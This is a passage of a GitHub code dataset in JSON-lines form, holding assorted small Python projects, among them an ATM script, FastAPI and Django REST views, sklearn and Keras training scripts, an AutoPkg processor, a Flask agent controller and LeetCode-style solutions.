float(input(\"Enter the amount to withdraw: ₹\"))\n if amount > balance:\n print(\"Insufficient balance.\")\n else:\n balance -= amount\n print(f\"Withdrawn ₹{amount:.2f}. Your remaining balance is ₹{balance:.2f}.\")\n elif user_data ==3:\n amount = float(input(\"Enter the amount to deposit: ₹\"))\n balance += amount\n print(f\"Deposited ₹{amount:.2f}. Your new balance is ₹{balance:.2f}.\") \n elif user_data == 4:\n print(\"Thank you for using our ATM. Have a great day!\")\n break\n else:\n print(\"Invalid choice. 
Please select a valid option.\")\n \n\n","repo_name":"samonfire-adm/pythontuts1-","sub_path":"miniProject/project 1/atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"34125804816","text":"from fastapi import UploadFile\nimport pandas, io\nfrom typing import List\n\nfrom fastapi.encoders import jsonable_encoder\nfrom pandas._libs.tslibs import NaT\nfrom sqlalchemy.orm import Session\n\nfrom crud.base import CRUDBase\nfrom models.asset import Asset\nfrom schemas.asset import AssetCreate, AssetUpdate\n\n\nclass CRUDAsset(CRUDBase[Asset, AssetCreate, AssetUpdate]):\n def create_with_item(\n self, db: Session, *, obj_in: AssetCreate, item_id: int\n ) -> Asset:\n obj_in_data = jsonable_encoder(obj_in)\n db_obj = self.model(**obj_in_data, item_id=item_id)\n db.add(db_obj)\n db.commit()\n db.refresh(db_obj)\n db_obj.order = float(db_obj.id)\n db.add(db_obj)\n db.commit()\n db.refresh(db_obj)\n return db_obj\n\n def get_multi_by_item(\n self,\n db: Session,\n *,\n item_id: int,\n skip: int = 0,\n # limit: int = 100\n ) -> List[Asset]:\n return (\n db.query(self.model)\n .filter(Asset.item_id == item_id)\n .offset(skip)\n # .limit(limit)\n .all()\n )\n\nasset = CRUDAsset(Asset)\n","repo_name":"firstArachne0116/product-qr-backend","sub_path":"app/app/crud/crud_asset.py","file_name":"crud_asset.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"5307606245","text":"import yaml\n\n\nclass SettingManager:\n\n def __init__(self):\n _settings = self.__file_load()\n self.common = _settings['app']['common']\n self.users = _settings['app']['users']\n\n def __file_load(self) -> dict:\n with open('setting.yml', encoding='utf-8') as f:\n _settings = yaml.load(f)\n return _settings\n","repo_name":"shiva768/imap-mail-watcher","sub_path":"setting_manager.py","file_name":"setting_manager.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14915761792","text":"from sklearn.model_selection import train_test_split\r\nfrom sklearn import metrics\r\nfrom sklearn.svm import SVC #support vector machine\r\nfrom sklearn.naive_bayes import GaussianNB #Gauss\r\nfrom sklearn.linear_model import LogisticRegression #Logistic Regression\r\nfrom sklearn.datasets import load_breast_cancer\r\n\r\nmachines = {\r\n \"SVC\":SVC(kernel=\"linear\"),\r\n \"Gauss\":GaussianNB(),\r\n \"LR\":LogisticRegression(solver=\"liblinear\")\r\n}\r\n\r\ndef main():\r\n dataset = load_breast_cancer()\r\n X = dataset.data\r\n Y = dataset.target\r\n x_train, x_test, y_train, y_test = train_test_split(X,Y,test_size=0.2,random_state=0)\r\n scores = {}\r\n for m in machines:\r\n print(\"running machine:\",m)\r\n machines[m].fit(x_train,y_train)\r\n y_pred = machines[m].predict(x_test)\r\n score = metrics.accuracy_score(y_test,y_pred)\r\n scores[m] = score\r\n print(\"score:\",score)\r\n print(\"confusion matrix:\\n\",metrics.confusion_matrix(y_test,y_pred))\r\n print(\"\\n\")\r\n return scores\r\n\r\nmain()","repo_name":"MachineLearningUCG2019/MachineLearning","sub_path":"greg_code/compare_machine.py","file_name":"compare_machine.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} 
+{"seq_id":"42352623824","text":"#!/usr/bin/python\n\nimport json\nimport urllib2\n\nfrom autopkglib import Processor, ProcessorError\n\n__all__ = [\"GenymotionURLProvider\"]\n\nclass GenymotionURLProvider(Processor):\n\tdecription = (\"Uses Genymotion API to find the latest version of application.\")\n\tinput_variables = {\n\t}\n\toutput_variables = {\n\t\t'genymotion_version': {\n\t\t\t'description': 'Version number',\n\t\t}\n\t}\n\n\tdescription = __doc__\n\n\tdef get_version(self):\n\t\t# Genymotion Update API\n\t\turl = 'https://cloud.genymotion.com/launchpad/last_version/mac/x64/'\n\t\t# API requires AJAX / XMLHttpRequest\n\t\theaders = {'X-Requested-With' :'XMLHttpRequest'}\n\t\ttry:\n\t\t\trequest = urllib2.Request(url, headers=headers)\n\t\t\tresponse = urllib2.urlopen(request)\n\t\t\t# Convert response to JSON\n\t\t\tjsondata = json.loads(response.read())\n\t\t\t# Example json return - {u'url': u'http://files2.genymotion.com/genymotion/genymotion-2.7.2/genymotion-2.7.2.dmg', u'version': u'2.7.2'}\n\t\t\treturn jsondata['version']\n\t\texcept:\n\t\t\traise ProcessorError('Could not retrieve version from URL: %s' % url)\n\n\tdef main(self):\n\t\tself.env['genymotion_version'] = self.get_version()\n\t\tself.output('Version: %s' % self.env['genymotion_version'])\n\nif __name__ == '__main__':\n\tprocessor = GenymotionURLProvider()\n\tprocessor.execute_shell()\n","repo_name":"natewalck/erikng-recipes","sub_path":"Genymobile/GenymotionURLProvider.py","file_name":"GenymotionURLProvider.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"30170587607","text":"from .client import DuelBot, Duel\nfrom .ability import Ability\n\n__title__ = \"codeduels\"\n__version__ = \"0.0.1a\"\n__description__ = \"Facebook Chat (Messenger) for Python\"\n\n__author__ = \"Adam McArthur\"\n__email__ = \"adam@mcaq.me\"\n\n__all__ = [\"DuelBot\", \"Ability\", \"Duel\"]\n","repo_name":"Sharpz7-Archives/codeduels","sub_path":"codeduel/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"30029731058","text":"# Given a string A denoting an expression. 
It contains the following operators '+', '-', '*', '/'.\r\n# Check whether A has redundant braces or not.\r\n# NOTE: A will be always a valid expression.\r\n# 1 <= |A| <= 10^5\r\n# Return 1 if A has redundant braces, else return 0.\r\ndef redundantBraces(A):\r\n stack = []\r\n\r\n for ch in A:\r\n if ch == ')':\r\n top = stack[-1]\r\n stack.pop()\r\n\r\n flag = True\r\n\r\n while top != '(':\r\n if top == '+' or top == '-' or top == '*' or top == '/':\r\n flag = False\r\n\r\n top = stack[-1]\r\n stack.pop()\r\n\r\n if flag:\r\n return 1\r\n\r\n else:\r\n stack.append(ch)\r\n\r\n return 0\r\n\r\n\r\nprint(redundantBraces(\"((a+b))\")) # 1\r\nprint(redundantBraces(\"(a+(a+b))\")) # 0\r\n","repo_name":"deysantanu84/python-portfolio","sub_path":"problemSolving/stacks/redundantBraces.py","file_name":"redundantBraces.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"18853246426","text":"\"\"\"\nOneCycle Learning Rate Scheduler\nDan Mezhiborsky - @dmezh\nSee:\nhttps://github.com/dmezh/convmixer-tf\nhttps://github.com/tmp-iclr/convmixer/issues/11#issuecomment-951947395\n\"\"\"\n\nimport numpy as np\nfrom tensorflow import keras\n\n\nclass OneCycleLRScheduler(keras.callbacks.Callback):\n def __init__(self, epoch_count, lr_max, batches_per_epoch):\n super().__init__()\n self.epoch_count = epoch_count\n self.epoch = 1\n self.lr_max = lr_max\n self.batches_per_epoch = batches_per_epoch\n\n def on_batch_begin(self, batch: int, logs=None):\n self.batch = batch\n self.t = self.epoch + (self.batch + 1) / self.batches_per_epoch\n sched = np.interp(\n [self.t],\n [0, self.epoch_count * 2 // 5,\n self.epoch_count * 4 // 5, self.epoch_count],\n [0, self.lr_max, self.lr_max / 20.0, 0],\n )[0]\n keras.backend.set_value(self.model.optimizer.lr, sched)\n\n def on_epoch_begin(self, epoch: int, logs=None):\n epoch = epoch + 1 # tensorflow is off-by-one :P\n self.epoch = epoch\n print(\n f\"lr at epoch {epoch}: {keras.backend.get_value(self.model.optimizer.lr)}\"\n )\n","repo_name":"kuantuna/SPDPvCNN","sub_path":"architectures/helpers/one_cycle.py","file_name":"one_cycle.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"85"} +{"seq_id":"2568637582","text":"#!/usr/bin/env python\nfrom flask import Flask, jsonify, abort, request, make_response\n\nimport requests\nimport json\nimport os\nimport time\nimport yaml\nimport config\nimport issuer\n\n# Load application settings (environment)\nconfig_root = os.environ.get('CONFIG_ROOT', '../config')\nENV = config.load_settings(config_root=config_root)\n\nclass BCRegController(Flask):\n def __init__(self):\n print(\"Initializing \" + __name__ + \" ...\")\n super().__init__(__name__)\n issuer.startup_init(ENV)\n\napp = BCRegController()\nwsgi_app = app.wsgi_app\n\n@app.route('/health', methods=['GET'])\ndef health_check():\n if issuer.tob_connection_synced():\n return make_response(jsonify({'success': True}), 200)\n else:\n abort(503, \"Connection not yet synced\")\n\n@app.route('/status/reset', methods=['GET'])\ndef clear_status():\n issuer.clear_stats()\n return make_response(jsonify({'success': True}), 200)\n\n@app.route('/status', methods=['GET'])\ndef get_status():\n return make_response(jsonify(issuer.get_stats()), 200)\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n@app.route('/issue-credential', 
methods=['POST'])\ndef submit_credential():\n \"\"\"\n Exposed method to proxy credential issuance requests.\n \"\"\"\n if not issuer.tob_connection_synced():\n abort(503, \"Connection not yet synced\")\n\n start_time = time.perf_counter()\n method = 'submit_credential.batch'\n\n if not request.json:\n end_time = time.perf_counter()\n issuer.log_timing_method(method, start_time, end_time, False)\n abort(400)\n\n cred_input = request.json\n\n response = issuer.handle_send_credential(cred_input)\n\n end_time = time.perf_counter()\n issuer.log_timing_method(method, start_time, end_time, True)\n\n return response\n\n\n@app.route('/api/agentcb/topic//', methods=['POST'])\ndef agent_callback(topic):\n \"\"\"\n Main callback for aries agent. Dispatches calls based on the supplied topic.\n \"\"\"\n start_time = time.perf_counter()\n method = 'agent_callback.' + topic\n\n if not request.json:\n end_time = time.perf_counter()\n issuer.log_timing_method(method, start_time, end_time, False)\n abort(400)\n\n message = request.json\n\n # dispatch based on the topic type\n if topic == issuer.TOPIC_CONNECTIONS:\n if \"state\" in message:\n method = method + '.' + message[\"state\"]\n response = issuer.handle_connections(message[\"state\"], message)\n else:\n response = jsonify({})\n\n elif topic == issuer.TOPIC_CONNECTIONS_ACTIVITY:\n response = jsonify({})\n\n elif topic == issuer.TOPIC_CREDENTIALS:\n if \"state\" in message:\n method = method + '.' + message[\"state\"]\n response = issuer.handle_credentials(message[\"state\"], message)\n else:\n response = jsonify({})\n\n elif topic == issuer.TOPIC_PRESENTATIONS:\n if \"state\" in message:\n method = method + '.' + message[\"state\"]\n response = issuer.handle_presentations(message[\"state\"], message)\n else:\n response = jsonify({})\n\n elif topic == issuer.TOPIC_GET_ACTIVE_MENU:\n response = issuer.handle_get_active_menu(message)\n\n elif topic == issuer.TOPIC_PERFORM_MENU_ACTION:\n response = issuer.handle_perform_menu_action(message)\n\n elif topic == issuer.TOPIC_ISSUER_REGISTRATION:\n response = issuer.handle_register_issuer(message)\n \n elif topic == issuer.TOPIC_PROBLEM_REPORT:\n response = issuer.handle_problem_report(message)\n\n else:\n print(\"Callback: topic=\", topic, \", message=\", message)\n end_time = time.perf_counter()\n issuer.log_timing_method(method, start_time, end_time, False)\n abort(400, {'message': 'Invalid topic: ' + topic})\n\n end_time = time.perf_counter()\n issuer.log_timing_method(method, start_time, end_time, True)\n\n return response\n","repo_name":"bcgov/von-oil-gas-poc","sub_path":"issuer_controller/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"23574072695","text":"# 18-842 Distributed Systems // Spring 2016.\n# Multegula - A P2P block breaking game.\n# MenuScreen.py.\n# Team Misfits // amahmoud. ddsantor. gmmiller. 
lunwenh.\n\n# imports\nfrom UI.typedefs import *\n\n# Menu Screen - buttons will be superimpsed on top of this screen to allow the user to\n# either start a solo game or join a network game.\nclass MenuScreen :\n ### __init__ - initialize and return a MenuScreen\n def __init__(self) :\n self.firstBack = True\n self.firstText = True\n\n ### setBackground - set the background in the canvsa\n def setBackground(self, canvas) :\n self.background = canvas.create_rectangle(0, 0, CANVAS_WIDTH, CANVAS_HEIGHT, fill = 'black', width = 0)\n\n self.foreground = canvas.create_rectangle(X_MARGIN, Y_MARGIN, CANVAS_WIDTH - X_MARGIN,\n CANVAS_HEIGHT - Y_MARGIN, fill = 'white', width = 0)\n\n ### setText - set the text in the canvas\n def setText(self, canvas) :\n self.title = canvas.create_text(X_CENTER, Y_LOC_TITLE, text = 'MULTEGULA',\n font = ('Courier', XL_TEXT_SIZE))\n\n self.t1 = canvas.create_text(X_CENTER, Y_LOC_AUTHOR1, text = 'created by',\n font = ('Courier', M_TEXT_SIZE))\n\n self.t2 = canvas.create_text(X_CENTER, Y_LOC_AUTHOR2, text = 'DS Team Misfits',\n font = ('Courier', M_TEXT_SIZE))\n\n ### drawBackground - manages drawing of the background\n def drawBackground(self, canvas) :\n if(self.firstBack) :\n self.setBackground(canvas)\n self.firstBack = False\n\n ### drawText - manages drawing of the text\n def drawText(self, canvas) :\n if(not(self.firstText)) :\n canvas.delete(self.title)\n canvas.delete(self.t1)\n canvas.delete(self.t2)\n self.setText(canvas)\n else :\n self.setText(canvas)\n self.firstText = False\n\n","repo_name":"arminm/multegula","sub_path":"UI/components/screens/MenuScreen.py","file_name":"MenuScreen.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"42806666234","text":"# -*- coding: utf-8 -*-\n\"\"\"\n거스름돈 : https://programmers.co.kr/learn/courses/30/lessons/12907?language=python3\n\"\"\"\n\nanswer = 0\ndef solution(n, money):\n if n == 0: return 1\n money.reverse()\n l = len(money)\n\n def DFS(L, s, i):\n global answer\n if s > n:\n return\n if s == n:\n answer = answer + 1\n # print(f'L = {L}, s = {s}, answer = {answer}')\n return\n for _i in range(i, l):\n DFS(L+1, s+money[_i], _i)\n\n DFS(0, 0, 0)\n\n return answer\n\n\nif __name__ == '__main__':\n result = solution(5, [1, 2, 5])\n print(f'result = {result}')\n assert result == 4\n\n","repo_name":"junjongwook/programmers","sub_path":"Skill Check/Level3/s12907_2.py","file_name":"s12907_2.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"24439426864","text":"class Solution:\n def pivotIndex(self, nums: List[int]) -> int:\n leftSum = 0 #keep track of the sum on the left side\n rightSum = sum(nums) #keep track of the sum on the right side\n for i in range(len(nums)):\n rightSum -= nums[i] #subtract this number from the right\n if leftSum == rightSum: #if the sums on the left and the right are equal\n return i #we found the pivot!\n leftSum += nums[i] #add this number to the left\n return -1\n \n ","repo_name":"Bloomh/LeetCode-Submissions","sub_path":"724-find-pivot-index/724-find-pivot-index.py","file_name":"724-find-pivot-index.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14577297922","text":"from sklearn.ensemble import GradientBoostingClassifier as GBDT\nimport pickle\nimport numpy as np\n\n\nif 
__name__ == \"__main__\":\n with open(\"VGG16_feature_dataset.pkl\", \"rb\") as f:\n p = pickle.load(f)\n train_x = p[\"train_conv_feature\"]\n test_x = p[\"test_conv_feature\"]\n train_y = np.asarray(np.argmax(p[\"train_label\"], axis=1), dtype=np.float32)\n test_y = np.asarray(np.argmax(p[\"test_label\"], axis=1), dtype=np.float32)\n clf = GBDT()\n print(train_x.shape, train_y.shape)\n clf.fit(train_x, train_y)\n print(np.mean(test_y == clf.predict(test_x)))\n\n","repo_name":"polarskie/yandeSpider","sub_path":"gbdt.py","file_name":"gbdt.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"23461550067","text":"#!/usr/bin/env python\nimport subprocess\nfrom pathlib import Path\nfrom supersolids.scripts.cp_plots import cp_plots\n\n\ndef string_float(s):\n return s, float(s)\n\n\n# Script runs, if script is run as main script (called by python *.py)\nif __name__ == \"__main__\":\n # path_anchor_input = Path(\"/home/dsche/supersolids/results/jospeh_injunction/real_global/\")\n # path_anchor_input = Path(\"/run/media/dsche/ITP Transfer/joseph_injunction2/y_kick/kick_1.0/\")\n path_anchor_input = Path(\"/run/media/dsche/ITP Transfer/joseph_injunction2/y_kick/kick_0.1/\")\n # path_anchor_input = Path(\"/run/media/dsche/ITP Transfer/joseph_injunction2/y_kick/kick_0.01/\")\n\n frame_start = 1610000\n # frame_start = 1210000\n steps_per_npz = 1000\n # movie_start = 695\n # movie_end = 714\n # movie_start = 720\n # movie_end = 739\n movie_start = 745\n movie_end = 764\n\n dt = 0.0002\n\n dir_name = \"movie\"\n counting_format = \"%03d\"\n\n steps_format = \"%07d\"\n\n dir_suffix = \"_right\"\n\n file_suffix = \"_fft\"\n inbuild_func = \"fft_plot\"\n # inbuild_func = \"\"\n # func = \"lambda x, y: (x, y)\"\n func = \"\"\n\n property_filename_suffix = dir_suffix + file_suffix\n\n subplots = True\n property_func = True\n property_name = \"get_center_of_mass\"\n # property_name = \"get_parity\"\n # property_name = \"get_peak_distances_along\"\n # property_name = \"get_peak_positions\"\n # property_args = [0]\n # property_args = []\n\n # property_name = \"get_phase_var\"\n # property_args = [0, 256, 0, 128, 0, 32]\n property_args = [0, 128, 0, 128, 0, 32]\n # property_args = [128, 256, 0, 128, 0, 32]\n\n # property_name = \"get_phase_var_neighborhood\"\n # [prob_min, amount]\n # property_args = [0.02, 4]\n\n # we want 2S=D, so that the peaks distance equals the distance between max and min of sin\n # delta = s * 2.0\n\n for i in range(movie_start, movie_end + 1):\n command = [\"python\", \"-m\", \"supersolids.tools.track_property\"]\n flags = [f\"-dt={dt}\",\n f\"-dir_path={path_anchor_input}\",\n f\"-dir_name={dir_name}{counting_format % i}\",\n f\"-frame_start={frame_start}\",\n f\"-steps_per_npz={steps_per_npz}\",\n f\"-steps_format={steps_format}\",\n f\"-property_name={property_name}\",\n f\"-property_filename_suffix={property_filename_suffix}\"]\n\n if property_func:\n flags.append(\"--property_func\")\n if property_args:\n property_args_parsed = list(map(str, property_args))\n flags.append(f\"--property_args\")\n flags += property_args_parsed\n if subplots:\n flags.append(f\"--subplots\")\n if inbuild_func:\n flags.append(f\"-inbuild_func={inbuild_func}\")\n if func:\n flags.append(f\"-func={func}\")\n\n # command needs flags to be provided as list\n command.extend(flags)\n\n print(command)\n p = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=False)\n\n # 
communicate needs flags to be provided as string seperated by \" \".\n flags_parsed = \" \".join(flags)\n out, err = p.communicate(flags_parsed.encode())\n print(f\"out:\\n{out}\\n\")\n print(f\"err:\\n{err}\\n\")\n\n # copy results from all movies into one directory (to compare them easier in image slideshows)\n path_anchor_output = Path(path_anchor_input, \"graphs\", property_name + dir_suffix)\n cp_plots(movie_start, (movie_end - movie_start) + 1,\n path_anchor_input, dir_name, property_name + property_filename_suffix,\n path_anchor_output, property_name + property_filename_suffix,\n counting_format, filename_extension=\".png\")\n","repo_name":"Scheiermann/supersolids","sub_path":"supersolids/scripts/multi_property.py","file_name":"multi_property.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"38861259297","text":"# -*- coding: utf-8 -*-\nimport numpy as np # linear algebra\nimport random\nimport os # accessing directory structure\nfrom keras.applications import ResNet50\nfrom keras.layers import Dense, Flatten, Input, Softmax, LeakyReLU\nfrom keras.models import Model\nfrom keras import optimizers\nfrom keras.initializers import RandomUniform\n# GENERATING TRAINING DATA\nfrom PIL import Image\nimport cv2\nfrom pathlib import Path\nimport keras.backend as kb\n\nRAND = RandomUniform(minval=-.1, maxval=.1)\nALPHA = .01\nBATCH = 30\n\n\ndef create_data(catCnt):\n img = []\n target = []\n catNames = [\"Black-grass\", \"Charlock\", \"Cleavers\", \"Common Chickweed\", \"Common wheat\", \"Fat Hen\", \"Loose Silky-bent\", \"Maize\", \"Scentless Mayweed\", \"sp\", \"Small-flowered Cranesbill\", \"Sugar beet\"]\n catImgCnt = [335, 454, 349, 717, 259, 544, 806, 261, 609, 277, 581, 465]\n #cwd = os.getcwd()\n #dataLoc = \".\\\\data\"\n\n for i in range (catCnt):\n catNumber = random.randint(0,len(catNames)-1)\n catName = catNames[catNumber]\n tv = np.array([0,0,0,0,0,0,0,0,0,0,0,0])\n tv[catNumber] = 1\n imgLoc = str(i%catImgCnt[catNumber])+\".png\"\n pathImg = os.path.join(\"IntSys-Seedling\\\\data\",catName,imgLoc)\n path = Path(pathImg)\n if(path.is_file()):\n\n im_frame = cv2.imread(pathImg)\n if im_frame is not None:\n #resizing the image to 224, 224. 
This is a basic solution to the issue to varying image size\n h, w = 224, 224\n res_im = cv2.resize(im_frame, (w,h), interpolation=cv2.INTER_LINEAR)\n img.append(res_im)\n target.append(tv)\n return img, target\n\n#input layer description + creation\ndef create_resnet_layers( in_layer, freeze):\n #inLayer = Input(shape=(224, 224, 3), name='in_layer')\n res = ResNet50(weights = 'imagenet', include_top = False)\n cntr = 0\n if freeze and (cntr < 10 or cntr > 40):\n for l in res.layers :\n l.trainable = False\n cntr += 1\n cnn = (res)(in_layer)\n flat = Flatten()(cnn)\n\n den_1 = Dense(50, kernel_initializer = RAND, name = 'den_1')(flat)\n relu_ff_1 = LeakyReLU(ALPHA, name = 'relu_ff_1')(den_1)\n den_2 = Dense(12, kernel_initializer = RAND, name = 'den_2')(relu_ff_1)\n relu_ff_2 = LeakyReLU(ALPHA, name = 'relu_ff_2')(den_2)\n output = Softmax(name = 'soft')(relu_ff_2)\n return output\n\n#compile model\ndef create_model(freeze, p):\n in_layer = Input(shape=(224, 224, 3), name='in_layer')\n output = create_resnet_layers(in_layer, freeze)\n model = Model(inputs=in_layer, outputs = output)\n model.compile(optimizer='adam',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n if(p):\n print(model.summary())\n return model\n\ndef train_baselineRes(freeze, p, cnt):\n model = create_model(freeze,p)\n img, target = create_data(cnt)\n length = len(img)\n trainImg = img[:int(length*.8)]\n trainTarget = target[:int(length*.8)]\n testImg = img[int(length*.8):]\n testTarget = target[int(length*.8):]\n model.fit(x=np.array(trainImg), y=np.array(trainTarget), batch_size=BATCH, epochs = 90, shuffle=True, validation_data = (np.array(testImg), np.array(testTarget)))\n #acc = 0\n #while acc < .9:\n # model.fit(x=np.array(trainImg), y=np.array(trainTarget), batch_size=BATCH, epochs = 100, shuffle=True, validation_data = (np.array(testImg), np.array(testTarget)))\n # loss, acc = model.evaluate(x=np.array(testImg), y=np.array(testTarget), verbose=1)\n #print(loss, \"\\n\", acc)\n model.save_weights('resBaseLine.h5')\n","repo_name":"CornellDataScience/IntSys-Seedling","sub_path":"models/resnet/resnet_keras.py","file_name":"resnet_keras.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"21529836949","text":"from rest_framework import generics\nfrom django.db.utils import IntegrityError \nfrom django.http import QueryDict\n\nfrom .models import Institution, InstitutionSettings, InstitutionStaff\nfrom .serializers import InstitutionCreateSerializer, InstitutionSettingsCreateSerializer, InstitutionStaffCreateSerializer\nfrom accounts.serializers import UserSerializer, InstitutionUserSerializer\nfrom django.http import Http404\nfrom rest_framework.views import APIView\nfrom accounts.models import User\nfrom helpers.helpers import get_object\n\nfrom rest_framework.response import Response\nfrom rest_framework import serializers\nfrom rest_framework import status\nfrom rest_framework import permissions\nfrom accounts.permissions import BranchManagerPermissions, LoanClientPermissions, LoanOfficerPermissions, InstitutionAdministratorPermissions, InstitutionAdministratorAndLoanOfficerPermissions\n\n\nclass InstitutionList(APIView):\n \"\"\"\n List all institutions and create institutions\n \"\"\"\n permission_classes = (permissions.IsAuthenticated, InstitutionAdministratorPermissions)\n\n def post(self, request, format=None):\n serializer = InstitutionCreateSerializer(data=request.data)\n if 
serializer.is_valid():\n try:\n serializer.save(created_by=self.request.user, is_institution_active=True)\n data_dict = {\"status\":201, \"data\":serializer.data}\n return Response(data_dict, status=status.HTTP_201_CREATED)\n except:\n return Response({'Error':'User has already created an institution'})\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass InstitutionDetail(APIView):\n \"\"\"\n Get institution Details\n \"\"\"\n permission_classes = (permissions.IsAuthenticated, InstitutionAdministratorAndLoanOfficerPermissions)\n\n def get(self, request, pk, format=None):\n institution = get_object(Institution, pk)\n if institution:\n institution_serializer = InstitutionCreateSerializer(institution)\n return Response(institution_serializer.data, status=status.HTTP_200_OK)\n else:\n error_message_dict = {\"status\":404, \"error\":\"Institution doesnot exist\"}\n return Response(error_message_dict, status=status.HTTP_404_NOT_FOUND)\n\n # def put(self, request, pk, format=None):\n # loan_group = get_object(Loans, pk)\n # serializer = LoansSerializer(loan_group, data=request.data)\n # if serializer.is_valid():\n # serializer.save()\n # return Response(serializer.data)\n # return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass InstitutionSettingsList(APIView):\n \"\"\"\n List all insttitution settings and create an institution setting\n \"\"\"\n permission_classes = (permissions.IsAuthenticated, InstitutionAdministratorPermissions)\n\n # def get(self, request, format=None):\n # snippets = InstitutionSettings.objects.all()\n # serializer = InstitutionSettingsCreateSerializer(snippets, many=True)\n # data_dict = {\"status\":200, \"data\":serializer.data}\n # return Response(data_dict, status=status.HTTP_200_OK)\n\n def post(self, request, format=None):\n serializer = InstitutionSettingsCreateSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n data_dict = {\"status\":201, \"data\":serializer.data}\n return Response(data_dict, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass InstitutionSettingsDetail(APIView):\n \"\"\"\n Get institution Settings Details\n \"\"\"\n permission_classes = (permissions.IsAuthenticated, InstitutionAdministratorAndLoanOfficerPermissions)\n\n def get(self, request, pk, format=None):\n institution_settings = get_object(InstitutionSettings, pk)\n if institution_settings:\n institution_settings_serializer = InstitutionSettingsCreateSerializer(institution_settings)\n return Response(institution_settings_serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(\"Institution doesnot exist\", status=status.HTTP_404_NOT_FOUND)\n\nclass InstitutionStaffCreate(APIView):\n\n permission_classes = (permissions.IsAuthenticated, InstitutionAdministratorPermissions)\n def post(self, request, format=None):\n staff_data = request.data.copy()\n # try:\n username = staff_data.pop('username', None)\n first_name = staff_data.pop('first_name', None)\n last_name = staff_data.pop('last_name', None)\n email = staff_data.pop('email', None)\n password = staff_data.pop('password', None)\n\n user_data_dict = {\n 'username':username[0],\n 'first_name':first_name[0],\n 'last_name': last_name[0],\n 'email':email[0],\n 'password':password[0],\n }\n\n #recreating the query dict\n user_data_query_dict = QueryDict('', mutable=True)\n user_data_query_dict.update(user_data_dict)\n\n staff_serializer = InstitutionStaffCreateSerializer(data=staff_data)\n 
if staff_serializer.is_valid():\n #add query dict to user serializer\n user_account_serializer = InstitutionUserSerializer(data=user_data_query_dict)\n user_account_serializer.is_valid(raise_exception=True)\n if staff_serializer.validated_data['staff_role'] == 'LOAN_OFFICER':\n user_account_serializer.save(is_loan_officer=True)\n elif staff_serializer.validated_data['staff_role'] == 'BRANCH_MANAGER':\n user_account_serializer.save(is_branch_manager=True)\n elif staff_serializer.validated_data['staff_role'] == 'LOAN_MANAGER':\n user_account_serializer.save(is_loan_manager=True)\n elif staff_serializer.validated_data['staff_role'] == 'TELLER':\n user_account_serializer.save(is_teller=True)\n elif staff_serializer.validated_data['staff_role'] == 'ASST_BRANCH_MANAGER':\n user_account_serializer.save(is_asst_branch_manager=True)\n\n user = User.objects.get(pk=user_account_serializer.data['id'])\n \n staff_serializer.save(user_id=user)\n \n #send twilio sms with registration details\n phone_number = \"{}{}\".format(staff_serializer.data['phone_dialing_code'], staff_serializer.data['phone_number'])\n message = \"Welcome to MFI, Your one time password is 0098\"\n try:\n send_sms(phone_number, message)\n except:\n print(\"Message Not sending\")\n data_dict = {\"status\":201, \"data\":staff_serializer.data}\n return Response(data_dict, status=status.HTTP_201_CREATED)\n # except:\n # print(\"Failed\")\n # # return Response(member_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n return Response(staff_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n","repo_name":"KapsonLabs/mfi-systems","sub_path":"mfi_systems_api/institution/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7050,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"74740140437","text":"#!/usr/bin/env python2.6\n\nfrom time import time\nfrom gmpy import gcd # much faster than homecoded or fractions.gcd()\nstart = time()\n\n# Section 1: preliminary definitions\np = 1009; pm1 = p - 1\nq = 3643; qm1 = q - 1\nn = p * q\nphi = pm1 * qm1\n\n# Section 2: building our list of usable e values, as an iterator object\nes = (e for e 